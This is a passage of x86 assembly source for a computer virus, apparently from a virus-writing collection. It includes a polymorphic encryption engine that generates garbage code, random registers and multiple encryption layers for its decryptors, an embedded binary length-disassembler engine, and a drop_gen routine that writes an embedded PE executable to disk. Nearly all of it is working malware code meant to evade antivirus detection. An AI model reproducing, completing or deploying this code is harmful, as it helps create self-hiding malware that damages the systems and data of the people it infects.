xchg eax,ebx
|
||
call unset_used
|
||
xchg eax,ecx
|
||
inc al
|
||
inc al ; mov ss,reg
|
||
stosw
|
||
ret
|
||
|
||
mem_write:
|
||
; write a dd somewhere (back where we won't go :) ) and then check
|
||
; if the contents are the same after some garbage
|
||
cmp byte ptr [edx - (offset t_pushed - offset m_writes)],01h
|
||
; don't nest, could work
|
||
je exit_mw_r ; on same addy (should be)
|
||
; well we could even put this
|
||
; away :P
|
||
inc byte ptr [edx - (offset t_pushed - offset m_writes)]
|
||
call get_random ; get a register
|
||
and ah,0111000b
|
||
push eax
|
||
add ah,05h
|
||
mov al,089h
|
||
stosw
|
||
mov ecx,[edx - (offset t_pushed - offset t_inipnt)]
|
||
restart_memsearch:
|
||
mov ebx,[edx - (offset t_pushed - offset w_loopbg)]
|
||
or ebx,ebx ; not in the loop
|
||
jnz looping_alr
|
||
cmp byte ptr [edx - (offset t_pushed - offset t_inacall)],01h
|
||
; could overwrite ourslv
|
||
jne can_proceed_mw
|
||
bad_mem:
|
||
pop eax
|
||
dec edi
|
||
dec edi
|
||
exit_mw:
|
||
dec byte ptr [edx - (offset t_pushed - offset m_writes)]
|
||
exit_mw_r:
|
||
ret
|
||
can_proceed_mw:
|
||
mov ebx,edi ; else can do from here down, anyway
|
||
; we won't return to it and we are
|
||
; sure that layers are not back
|
||
looping_alr:
|
||
sub ebx,4
|
||
cmp ebx,ecx ; is there at least a bit of place?
|
||
jbe bad_mem
|
||
call get_random
|
||
and eax,03ffh
|
||
sub ebx,eax
|
||
sub ebx,ecx
|
||
jc restart_memsearch
|
||
add ebx,[edx - (offset t_pushed - offset v_runnin)]
|
||
mov eax,ebx
|
||
stosd
|
||
|
||
call get_random ; check what was written or not?
|
||
shr al,1 ; to make less visibile maybe ;)
|
||
pop eax ; the used reg
|
||
jc exit_mw
|
||
xchg al,ah
|
||
shr al,3
|
||
call is_used
|
||
pushf
|
||
call set_used
|
||
call rnd_garbage
|
||
popf
|
||
push ebx
|
||
jnz wasntusedb
|
||
mov ebx,eax ; if was used then nuthing, else
|
||
call unset_used ; put reusable
|
||
wasntusedb:
|
||
shl al,3
|
||
add al,5
|
||
mov ah,03bh ; cmp reg, memval
|
||
xchg ah,al
|
||
stosw
|
||
pop eax
|
||
stosd ; the addy
|
||
jmp check_okequ
|
||
|
||
from_stack: ; read/write stuff from stack referencing
|
||
; with esp quite often found in windoze code
|
||
call get_random ; type of operation
|
||
and al,0fh
|
||
cmp al,8
|
||
jae make_mov
|
||
shl al,3
|
||
inc al
|
||
jmp selected_op
|
||
make_mov:
|
||
mov al,89h
|
||
selected_op:
|
||
mov ch,al
|
||
bswap eax
|
||
mov al,byte ptr [ebp + t_pushed] ; 'our' dd on stack
|
||
or al,al
|
||
jz cant_write_anyway
|
||
|
||
cmp byte ptr [ebp + t_inacall],01h
|
||
je cant_write_anyway
|
||
|
||
dec al
|
||
mov cl,al
|
||
|
||
call get_random_al7
|
||
cmp al,cl
|
||
ja cant_write_anyway ; don't retry, so less writes
|
||
mov ah,al
|
||
jmp prepare_all
|
||
cant_write_anyway:
|
||
and ah,0111b
|
||
add ch,02h
|
||
prepare_all:
|
||
mov al,ch
|
||
stosb
|
||
call get_register
|
||
shl cl,3
|
||
or ah,ah
|
||
jz dont_addesp ; just [esp], no + imm
|
||
add cl,40h
|
||
dont_addesp:
|
||
add cl,04h
|
||
xchg al,cl
|
||
stosb
|
||
mov al,24h
|
||
stosb
|
||
or ah,ah
|
||
jz no_immesp
|
||
shl ah,2 ; * 4, dword padded is always used
|
||
mov al,ah
|
||
stosb
|
||
no_immesp:
|
||
ret
|
||
|
||
; tables for various purposes
|
||
garbage_mask equ 1fh
|
||
garbage_number equ 14h
|
||
|
||
garbage_offsets:
|
||
dd offset call_subroutines
|
||
dd offset gen_one_byters
|
||
dd offset mov_registers
|
||
dd offset mem_assign
|
||
dd offset mem_mathops
|
||
dd offset maths_immediate
|
||
dd offset maths_immediate_short
|
||
dd offset maths_registers
|
||
dd offset rotating_imms
|
||
dd offset notneg_register
|
||
dd offset imm_assign
|
||
dd offset inc_dec_reg
|
||
dd offset xchg_regs
|
||
dd offset test_regs
|
||
dd offset temp_save_change
|
||
dd offset cdq_jmps_savestack
|
||
dd offset diff_movz
|
||
dd offset sets_misc
|
||
dd offset xadd_cmpxchg
|
||
dd offset emu_stuffy
|
||
dd offset from_stack
|
||
|
||
one_byters db 090h,0fch,0fdh,0f8h,0f9h,0f5h,070h,080h
|
||
|
||
change_jump db 098h,099h,0ebh,0e9h
|
||
|
||
_math_imm:
|
||
dw 008c1h ; ror d[ebx],imm
|
||
dw 02881h ; sub d[ebx],imm
|
||
dw 03081h ; xor d[ebx],imm
|
||
dw 00081h ; add d[ebx],imm
|
||
dw 000c1h ; rol d[ebx],imm
|
||
_math_key:
|
||
dw 008d3h ; ror d[ebx],cl
|
||
dw 00029h ; sub d[ebx],eax
|
||
dw 00031h ; xor d[ebx],eax
|
||
dw 00001h ; add d[ebx],eax
|
||
dw 000d3h ; rol d[ebx],cl
|
||
|
||
; cmp,or,xor,sub,add
|
||
chk_counter db 0f8h,0c8h
|
||
key_changers db 0e8h,0f0h,0c0h ; xor sub add
|
||
db 0c0h,0c8h ; ror rol
|
||
db 0d0h ; not
|
||
db 040h,048h ; inc dec
|
||
|
||
krappo_gen:
|
||
call get_random ; generate krap bytes
|
||
and eax,01fh
|
||
jz exit_krappo
|
||
xchg eax,ecx
|
||
krap_stuffy:
|
||
call get_random
|
||
stosb
|
||
loop krap_stuffy
|
||
exit_krappo:
|
||
ret
|
||
|
||
get_random_al7:
|
||
call get_random
|
||
and eax,0111b
|
||
ret
|
||
|
||
get_random:
|
||
push ebx
|
||
push edx
|
||
|
||
db 0b8h ; mov eax,
|
||
seed dd 000h ; random seed, must be < im
|
||
mov ebx,4096d ; ia
|
||
mul ebx
|
||
add eax,150889d ; ic
|
||
adc edx,0
|
||
mov ebx,714025d ; im
|
||
push ebx
|
||
div ebx
|
||
mov dword ptr [seed+ebp],edx
|
||
xchg eax,edx
|
||
cdq
|
||
xor ebx,ebx
|
||
dec ebx
|
||
mul ebx ; * 2^32 - 1
|
||
pop ebx
|
||
div ebx ; here we have a 0<=rnd<=2^32
|
||
pop edx
|
||
pop ebx
|
||
ret
|
||
|
||
is_used:
|
||
; AL register
|
||
push eax
|
||
mov cl,al
|
||
mov al,1
|
||
shl al,cl
|
||
test byte ptr [r_used+ebp],al
|
||
pop eax
|
||
; Z = register not used
|
||
; NZ = register used
|
||
ret
|
||
|
||
set_used:
|
||
; AL register
|
||
push eax
|
||
xor ah,ah
|
||
bts word ptr [r_used+ebp],ax
|
||
pop eax
|
||
ret
|
||
|
||
unset_used:
|
||
; BL register
|
||
xor bh,bh
|
||
btr word ptr [r_used+ebp],bx
|
||
ret
|
||
|
||
get_register:
|
||
push eax
|
||
reget_reg:
|
||
call get_random_al7
|
||
call is_used
|
||
jnz reget_reg ; check we aren't using it
|
||
; the is_used will put the reg in cl
|
||
pop eax
|
||
ret
|
||
|
||
get_address:
|
||
push esi
|
||
mov ebx,edi
|
||
lea esi,[offset v_runnin + ebp]
|
||
db 081h,0ebh ; sub ebx,initial_edi
|
||
t_inipnt dd 00h ; so we have actualy dec lenght
|
||
|
||
add ebx,dword ptr [esi - (offset v_runnin - offset v_lenght)]
|
||
mov edx,dword ptr [esi]
|
||
|
||
db 0b1h ; mov cl,
|
||
t_memand db 00h ; significant bits present
|
||
|
||
add edx,ebx
|
||
|
||
search_offset2:
|
||
call get_random
|
||
shl eax,cl
|
||
shr eax,cl
|
||
cmp eax,dword ptr [esi] ; is < starting off of poly?
|
||
jb search_offset2
|
||
look_foroff2:
|
||
cmp eax,edx ; upper border
|
||
jbe ok_offset2
|
||
sub eax,ebx
|
||
jmp look_foroff2
|
||
ok_offset2:
|
||
pop esi
|
||
ret
|
||
|
||
; how much memory does the ETMS need, so you can substract from the lenght
|
||
; of the virus on file of course
|
||
_mem_space = (offset _mem_data_end - offset _mem_data_start)
|
||
|
||
; everything down there just in mem, don't save it in your file
|
||
_mem_data_start:
|
||
|
||
r_pointer db 00h ; register used as pointer
|
||
r_counter db 00h ; register used as counter
|
||
r_regkey db 00h ; register used as key, 20h use
|
||
; immediate as key
|
||
r_used db 00000000b
|
||
; bits meaning 0 0 0 1 0 0 0 0
|
||
; E E E E E E E E
|
||
; D S B S B D C A
|
||
; I I P P X X X X
|
||
|
||
t_chgpnt db 00h ; changes to be made to pointer
|
||
t_chgcnt db 00h ; changes to be made to counter
|
||
t_chgkey db 00h ; changes to be made to key register
|
||
t_chgmat db 00h ; changes to be made to operation
|
||
t_exitjmp db 00h ; 01 has to create exit jmp, 00h no
|
||
t_prejmp db 00h ; number of key changes b4 jmp
|
||
m_writes db 00h ; already written mem in a loop?
|
||
; ne stavit nic tukaj ali menjaj inicializacijo!
|
||
t_pntoff dd 00h ; offset added to pointer (00h if not
|
||
; added)
|
||
t_cntoff dd 00h ; constant to be added to counter
|
||
; value
|
||
|
||
t_fromend db 00h ; 00h from start, else from end
|
||
t_countback db 00h ; 01h decrementing, else incrementing
|
||
|
||
t_pushed db 00h ; pushed dwords
|
||
t_maxjmps db 00h ; max jumps
|
||
t_inacall db 00h ; into a call or not
|
||
db 00h
|
||
|
||
v_lenght dd 00h ; lenght
|
||
v_virusp dd 00h ; pointer to body
|
||
v_runnin dd 00h ; offset at which dec will run
|
||
|
||
w_counter dd 00h ; where counter is assigned - 1
|
||
w_loopbg dd 00h ; where loop begins
|
||
w_encrypt dd 00h ; pointer on current pos in encryptor
|
||
|
||
orig_dx dd 00h
|
||
t_chkpos dd 00h ; position of the checking jmp
|
||
|
||
l_space equ (enc_max + 10h)
|
||
tl_space equ (6 * l_space)
|
||
layer_end dd 00h ; last nr of layer * layer dim
|
||
layer_nr dd tl_space ; number of layers (0-6) * layer dim
|
||
|
||
; data structures for all the layers
|
||
; first layer is the last in mem and so on...
|
||
enc_space:
|
||
dd 00h ; initial key
|
||
dd 00h ; counter
|
||
dd 00h ; initial pointer
|
||
dd 00h ; position of the pointer in dec
|
||
db enc_max dup (90h) ; encryptor
|
||
|
||
dd 4 dup (00h)
|
||
db enc_max dup (90h)
|
||
|
||
dd 4 dup (00h)
|
||
db enc_max dup (90h)
|
||
|
||
dd 4 dup (00h)
|
||
db enc_max dup (90h)
|
||
|
||
dd 4 dup (00h)
|
||
db enc_max dup (90h)
|
||
|
||
dd 4 dup (00h)
|
||
db enc_max dup (90h)
|
||
|
||
dd 4 dup (00h)
|
||
db enc_max dup (90h)
|
||
_mem_data_end:
|
||
|
||
|
||
|
||
; LDE32BIN.INC -- Length-Disassembler Engine //32-bit
|
||
; 1.06
|
||
; generated file. do not edit
|
||
disasm_init:
|
||
db 060h,08Bh,07Ch,024h,024h,0FCh,033h,0C0h
|
||
db 050h,050h,050h,068h,000h,0A8h,0AAh,002h
|
||
db 068h,07Fh,068h,0FFh,03Fh,068h,0A0h,0DEh
|
||
db 0E6h,0FFh,068h,0FFh,0FFh,0D5h,0DBh,068h
|
||
db 0AAh,0AAh,0FEh,0FFh,068h,0AAh,0AAh,0AAh
|
||
db 0AAh,068h,000h,000h,0AAh,0AAh,050h,050h
|
||
db 050h,050h,050h,050h,068h,054h,001h,000h
|
||
db 000h,068h,055h,0F5h,0FFh,041h,068h,0AAh
|
||
db 0DDh,0DEh,055h,068h,011h,051h,095h,019h
|
||
db 068h,0FFh,01Fh,011h,011h,068h,0AAh,0FFh
|
||
db 011h,0FAh,068h,096h,0CFh,060h,08Eh,068h
|
||
db 0AAh,0D6h,072h,0FCh,068h,088h,0AAh,0AAh
|
||
db 0AAh,068h,0D5h,088h,088h,088h,068h,09Bh
|
||
db 055h,08Dh,052h,068h,053h,0D5h,06Ch,036h
|
||
db 068h,0FFh,055h,055h,035h,068h,0F9h,0D6h
|
||
db 0FEh,0FFh,068h,088h,088h,088h,068h,068h
|
||
db 088h,088h,088h,088h,068h,0CAh,047h,053h
|
||
db 08Dh,068h,0DFh,07Bh,0C6h,0DCh,068h,0AAh
|
||
db 0AAh,0AAh,0AAh,068h,0AAh,0AAh,0AAh,0AAh
|
||
db 068h,0FDh,04Fh,0A9h,0ABh,068h,0EAh,0FEh
|
||
db 0A7h,0D4h,068h,029h,075h,0FFh,053h,068h
|
||
db 0FEh,0A7h,0A4h,0FFh,068h,04Ah,0FAh,09Fh
|
||
db 092h,068h,0FFh,029h,0E9h,07Fh,0B9h,000h
|
||
db 002h,000h,000h,033h,0DBh,033h,0C0h,0E8h
|
||
db 014h,000h,000h,000h,0ABh,0E2h,0F6h,061h
|
||
db 0C3h,00Bh,0DBh,075h,007h,05Dh,05Eh,05Ah
|
||
db 056h,055h,0B3h,020h,04Bh,0D1h,0EAh,0C3h
|
||
db 0E8h,0ECh,0FFh,0FFh,0FFh,00Fh,083h,07Fh
|
||
db 000h,000h,000h,0E8h,0E1h,0FFh,0FFh,0FFh
|
||
db 073h,003h,0B4h,040h,0C3h,0E8h,0D7h,0FFh
|
||
db 0FFh,0FFh,072h,057h,0E8h,0D0h,0FFh,0FFh
|
||
db 0FFh,073h,04Dh,0E8h,0C9h,0FFh,0FFh,0FFh
|
||
db 073h,043h,0E8h,0C2h,0FFh,0FFh,0FFh,072h
|
||
db 025h,0E8h,0BBh,0FFh,0FFh,0FFh,073h,003h
|
||
db 0B0h,020h,0C3h,0E8h,0B1h,0FFh,0FFh,0FFh
|
||
db 073h,005h,066h,0B8h,002h,020h,0C3h,0E8h
|
||
db 0A5h,0FFh,0FFh,0FFh,073h,005h,066h,0B8h
|
||
db 008h,010h,0C3h,0B4h,003h,0C3h,0E8h,096h
|
||
db 0FFh,0FFh,0FFh,073h,003h,0B4h,060h,0C3h
|
||
db 0E8h,08Ch,0FFh,0FFh,0FFh,073h,003h,0B0h
|
||
db 018h,0C3h,0B4h,002h,0C3h,0B4h,080h,0C3h
|
||
db 0B4h,001h,0C3h,0E8h,079h,0FFh,0FFh,0FFh
|
||
db 073h,00Dh,0E8h,072h,0FFh,0FFh,0FFh,073h
|
||
db 003h,0B0h,008h,0C3h,0B4h,041h,0C3h,0B4h
|
||
db 020h,0C3h,0E8h,062h,0FFh,0FFh,0FFh,014h
|
||
db 000h,048h,0C3h
|
||
disasm_main:
|
||
db 060h,08Bh,074h,024h,024h,08Bh,04Ch,024h
|
||
db 028h,033h,0D2h,033h,0C0h,080h,0E2h,0F7h
|
||
db 08Ah,001h,041h,00Bh,014h,086h,0F6h,0C2h
|
||
db 008h,075h,0F2h,03Ch,0F6h,074h,036h,03Ch
|
||
db 0F7h,074h,032h,03Ch,0CDh,074h,03Bh,03Ch
|
||
db 00Fh,074h,044h,0F6h,0C6h,080h,075h,052h
|
||
db 0F6h,0C6h,040h,075h,073h,0F6h,0C2h,020h
|
||
db 075h,054h,0F6h,0C6h,020h,075h,05Ch,08Bh
|
||
db 0C1h,02Bh,044h,024h,028h,081h,0E2h,007h
|
||
db 007h,000h,000h,002h,0C2h,002h,0C6h,089h
|
||
db 044h,024h,01Ch,061h,0C3h,080h,0CEh,040h
|
||
db 0F6h,001h,038h,075h,0CEh,080h,0CEh,080h
|
||
db 0EBh,0C9h,080h,0CEh,001h,080h,039h,020h
|
||
db 075h,0C1h,080h,0CEh,004h,0EBh,0BCh,08Ah
|
||
db 001h,041h,00Bh,094h,086h,000h,004h,000h
|
||
db 000h,083h,0FAh,0FFh,075h,0ADh,08Bh,0C2h
|
||
db 0EBh,0CDh,080h,0F6h,020h,0A8h,001h,075h
|
||
db 0A7h,080h,0F6h,021h,0EBh,0A2h,080h,0F2h
|
||
db 002h,0F6h,0C2h,010h,075h,0A4h,080h,0F2h
|
||
db 006h,0EBh,09Fh,080h,0F6h,002h,0F6h,0C6h
|
||
db 010h,075h,09Ch,080h,0F6h,006h,0EBh,097h
|
||
db 08Ah,001h,041h,08Ah,0E0h,066h,025h,007h
|
||
db 0C0h,080h,0FCh,0C0h,00Fh,084h,07Bh,0FFh
|
||
db 0FFh,0FFh,0F6h,0C2h,010h,075h,02Dh,03Ch
|
||
db 004h,075h,005h,08Ah,001h,041h,024h,007h
|
||
db 080h,0FCh,040h,074h,017h,080h,0FCh,080h
|
||
db 074h,00Ah,066h,03Dh,005h,000h,00Fh,085h
|
||
db 059h,0FFh,0FFh,0FFh,080h,0CAh,004h,0E9h
|
||
db 051h,0FFh,0FFh,0FFh,080h,0CAh,001h,0E9h
|
||
db 049h,0FFh,0FFh,0FFh,066h,03Dh,006h,000h
|
||
db 074h,00Eh,080h,0FCh,040h,074h,0EDh,080h
|
||
db 0FCh,080h,00Fh,085h,035h,0FFh,0FFh,0FFh
|
||
db 080h,0CAh,002h,0E9h,02Dh,0FFh,0FFh,0FFh
|
||
|
||
|
||
drop_gen:
|
||
; edx - path
|
||
push 0 edx
|
||
call [ebp._lcreat]
|
||
cmp eax, -1
|
||
jz __2
|
||
xchg eax, ebx
|
||
call __1
|
||
db 04Dh,05Ah,050h,000h,002h,000h,000h,000h,004h,000h,00Fh,000h,0FFh,0FFh
|
||
db 000h,000h,0B8h,000h,000h,000h,000h,000h,000h,000h,040h,000h,01Ah,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,001h,000h,000h,0BAh,010h,000h,00Eh,01Fh,0B4h
|
||
db 009h,0CDh,021h,0B8h,001h,04Ch,0CDh,021h,090h,090h,054h,068h,069h,073h
|
||
db 020h,070h,072h,06Fh,067h,072h,061h,06Dh,020h,06Dh,075h,073h,074h,020h
|
||
db 062h,065h,020h,072h,075h,06Eh,020h,075h,06Eh,064h,065h,072h,020h,057h
|
||
db 069h,06Eh,033h,032h,00Dh,00Ah,024h,037h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,050h,045h,000h,000h,04Ch,001h,003h,000h,04Fh,02Ch
|
||
db 047h,069h,000h,000h,000h,000h,000h,000h,000h,000h,0E0h,000h,08Fh,083h
|
||
db 00Bh,001h,002h,019h,000h,002h,000h,000h,000h,004h,000h,000h,000h,000h
|
||
db 000h,000h,000h,010h,000h,000h,000h,010h,000h,000h,000h,020h,000h,000h
|
||
db 000h,000h,040h,000h,000h,010h,000h,000h,000h,002h,000h,000h,001h,000h
|
||
db 000h,000h,000h,000h,000h,000h,003h,000h,00Ah,000h,000h,000h,000h,000h
|
||
db 000h,040h,000h,000h,000h,004h,000h,000h,000h,000h,000h,000h,002h,000h
|
||
db 000h,000h,000h,000h,010h,000h,000h,020h,000h,000h,000h,000h,010h,000h
|
||
db 000h,010h,000h,000h,000h,000h,000h,000h,010h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,030h,000h,000h,054h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 043h,04Fh,044h,045h,000h,000h,000h,000h,000h,010h,000h,000h,000h,010h
|
||
db 000h,000h,000h,002h,000h,000h,000h,006h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,020h,000h,000h,060h,044h,041h
|
||
db 054h,041h,000h,000h,000h,000h,000h,010h,000h,000h,000h,020h,000h,000h
|
||
db 000h,000h,000h,000h,000h,008h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,040h,000h,000h,0C0h,02Eh,069h,064h,061h
|
||
db 074h,061h,000h,000h,000h,010h,000h,000h,000h,030h,000h,000h,000h,002h
|
||
db 000h,000h,000h,008h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,040h,000h,000h,0C0h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,06Ah,000h,0E8h,000h
|
||
db 000h,000h,000h,0FFh,025h,030h,030h,040h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
